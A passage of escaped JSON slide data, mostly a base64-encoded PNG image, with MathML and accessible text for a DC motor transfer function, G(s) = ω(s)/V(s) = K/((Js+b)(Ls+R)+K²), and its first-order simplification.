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E1hdGhNTAA8bWF0aCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OC9NYXRoL01hdGhNTCI+PG1zdHlsZSBtYXRoc2l6ZT0iMTZweCI+PG1pPkc8L21pPjxtZmVuY2VkPjxtaT5zPC9taT48L21mZW5jZWQ+PG1vPiYjeEEwOzwvbW8+PG1vPj08L21vPjxtbz4mI3gyMDA5OzwvbW8+PG1mcmFjPjxtcm93PjxtaT4mI3gzQzk7PC9taT48bWZlbmNlZD48bWk+czwvbWk+PC9tZmVuY2VkPjwvbXJvdz48bXJvdz48bWk+VjwvbWk+PG1mZW5jZWQ+PG1pPnM8L21pPjwvbWZlbmNlZD48L21yb3c+PC9tZnJhYz48bW8+PTwvbW8+PG1mcmFjPjxtaT5LPC9taT48bXJvdz48bWZlbmNlZD48bXJvdz48bWk+SjwvbWk+PG1pPnM8L21pPjxtbz4mI3hBMDs8L21vPjxtbz4rPC9tbz48bWk+YjwvbWk+PC9tcm93PjwvbWZlbmNlZD48bWZlbmNlZD48bXJvdz48bWk+TDwvbWk+PG1pPnM8L21pPjxtbz4mI3hBMDs8L21vPjxtbz4rPC9tbz48bW8+JiN4QTA7PC9tbz48bWk+UjwvbWk+PC9tcm93PjwvbWZlbmNlZD48bW8+JiN4QTA7PC9tbz48bW8+KzwvbW8+PG1vPiYjeEEwOzwvbW8+PG1zdXA+PG1pPks8L21pPjxtbj4yPC9tbj48L21zdXA+PC9tcm93PjwvbWZyYWM+PC9tc3R5bGU+PC9tYXRoPsdg6jEAAAAASUVORK5CYII=\&quot;,\&quot;slideId\&quot;:282,\&quot;accessibleText\&quot;:\&quot;G open parentheses s close parentheses space equals thin space fraction numerator omega open parentheses s close parentheses over denominator V open parentheses s close parentheses end fraction equals fraction numerator K over denominator open parentheses J s space plus b close parentheses open parentheses L s space plus space R close parentheses space plus space K squared end fraction\&quot;,\&quot;imageHeight\&quot;:24.676238035788597},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;G&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mfrac&gt;&lt;mrow&gt;&lt;mi&gt;&amp;#x3C9;&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mrow&gt;&lt;mrow&gt;&lt;mi&gt;V&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mfrac&gt;&lt;mi&gt;K&lt;/mi&gt;&lt;mrow&gt;&lt;mi&gt;J&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;b&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mstyle displaystyle=\\\&quot;true\\\&quot;&gt;&lt;mfrac&gt;&lt;msup&gt;&lt;mi&gt;K&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mi&gt;R&lt;/mi&gt;&lt;/mfrac&gt;&lt;/mstyle&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mfrac&gt;&lt;msub&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/msub&gt;&lt;mrow&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;iVBORw0KGgoAAAANSUhEUgAABfUAAAE9CAYAAACiKohKAAAACXBIWXMAAA7EAAAO